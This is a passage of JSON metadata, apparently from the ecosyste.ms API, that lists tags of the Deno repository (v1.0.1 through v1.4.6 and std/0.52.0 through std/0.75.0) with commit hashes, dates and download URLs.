denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/